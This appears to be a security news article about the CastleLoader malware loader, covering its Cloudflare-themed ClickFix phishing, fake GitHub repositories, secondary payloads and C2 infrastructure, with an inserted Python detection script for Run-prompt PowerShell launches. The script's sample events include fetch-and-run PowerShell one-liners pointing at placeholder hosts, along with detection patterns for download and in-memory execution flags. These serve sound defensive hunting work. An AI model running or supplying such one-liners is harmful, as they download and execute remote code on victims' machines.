CastleLoader Malware Infected Over 400 Devices Using Cloudflare-Themed ClickFix Phishing Attack

CastleLoader, a sophisticated malware loader that emerged in early 2025, has successfully compromised 469 devices out of 1,634 infection attempts since May 2025, achieving an alarming 28.7% infection rate.

This versatile threat has primarily targeted U.S. government entities through advanced phishing campaigns that exploit user trust in legitimate platforms and services.

The malware employs two primary infection vectors to deceive victims into executing malicious code.

The first method uses ClickFix phishing techniques themed around Cloudflare services: attackers register fraudulent domains that impersonate trusted services, posing as software development libraries, Google Meet, or browser update notifications.

These deceptive pages display fabricated error messages or CAPTCHA prompts, manipulating users into copying and executing malicious PowerShell commands through the Windows Run prompt.
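As an added example that is not from the article or from PolySwarm, the following Python hunt looks for the Run-prompt pattern described above in constructed Sysmon-style process-creation records: explorer.exe (the parent of anything launched from Win+R) spawning a script interpreter whose arguments combine hidden-window, policy-bypass, download and in-memory-evaluation flags. The sample events, field names, indicator list and two-hit threshold are all assumptions.

```python
import re

# Constructed Sysmon-style process-creation records (not from the article);
# the first has the shape of a ClickFix one-liner pasted into the Run prompt.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "irm https://example.invalid/verify | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},  # plain console from Run: no indicators
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},  # one hit only
    {"ParentImage": r"C:\Program Files\Vendor\Agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "irm https://example.invalid/update.ps1 | iex"'},  # not via Run prompt
]

# Argument patterns typical of copy-paste one-liners (assumed indicator set).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass\b", re.I),
    "encoded_cmd": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "in_memory_eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}
RUN_PROMPT_PARENT = "explorer.exe"  # Win+R hands the command to explorer.exe
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event, min_hits=2):
    """Return (flagged, matched indicator names) for one process-creation event."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    via_run_prompt = (basename(event["ParentImage"]) == RUN_PROMPT_PARENT
                      and basename(event["Image"]) in INTERPRETERS)
    return via_run_prompt and len(hits) >= min_hits, hits

def hunt(events):
    """Indices of events that look like a ClickFix execution, with the indicators matched."""
    findings = []
    for i, event in enumerate(events):
        flagged, hits = classify(event)
        if flagged:
            findings.append((i, hits))
    return findings

if __name__ == "__main__":
    for idx, hits in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

On a real host the same parent/child pairing can be pulled from Sysmon event ID 1 or Windows 4688, and the RunMRU key under HKCU gives the pasted text itself.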

PolySwarm analysts identified CastleLoader’s secondary infection method, which leverages fake GitHub repositories disguised as legitimate software tools.

One notable example includes a repository masquerading as SQL Server Management Studio (SSMS-lib), exploiting developers’ inherent trust in the GitHub platform to distribute malicious installers that establish connections to command-and-control servers.

The malware demonstrates remarkable versatility in its payload delivery capabilities, deploying various secondary threats including StealC, RedLine, DeerStealer, NetSupport RAT, SectopRAT, and HijackLoader.

These payloads serve different malicious purposes, from credential harvesting and cryptocurrency wallet theft to establishing persistent backdoor access for continued system control.

Technical Architecture and C2 Infrastructure

CastleLoader’s technical sophistication becomes evident through its multi-stage execution process utilizing PowerShell and AutoIT scripts.

Following initial compromise, the AutoIT component loads shellcode directly into system memory as a Dynamic Link Library (DLL), subsequently resolving hashed DLL names and API calls to establish communication with one of seven distinct command-and-control servers.

The malware operators manage their infrastructure through a web-based control panel that provides detailed victim telemetry, including unique identifiers, IP addresses, and system information.

This panel features specialized modules for payload management and precise distribution control, supporting geographic targeting capabilities and encrypted Docker containers to enhance operational security and evade detection mechanisms.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.